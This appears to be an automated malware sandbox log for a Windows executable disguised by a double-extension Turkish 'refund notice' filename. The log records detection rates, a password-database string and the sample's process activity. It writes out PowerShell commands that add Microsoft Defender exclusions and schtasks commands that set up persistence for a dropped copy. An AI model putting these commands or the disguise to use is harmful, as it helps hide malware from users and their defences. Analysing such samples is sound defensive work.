                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003029000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003035000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003003000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeVirustotal: Detection: 27%
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeReversingLabs: Detection: 50%
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeFile read: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\SOFcFE.exe C:\Users\user\AppData\Roaming\SOFcFE.exe
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe"
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: mscoree.dll
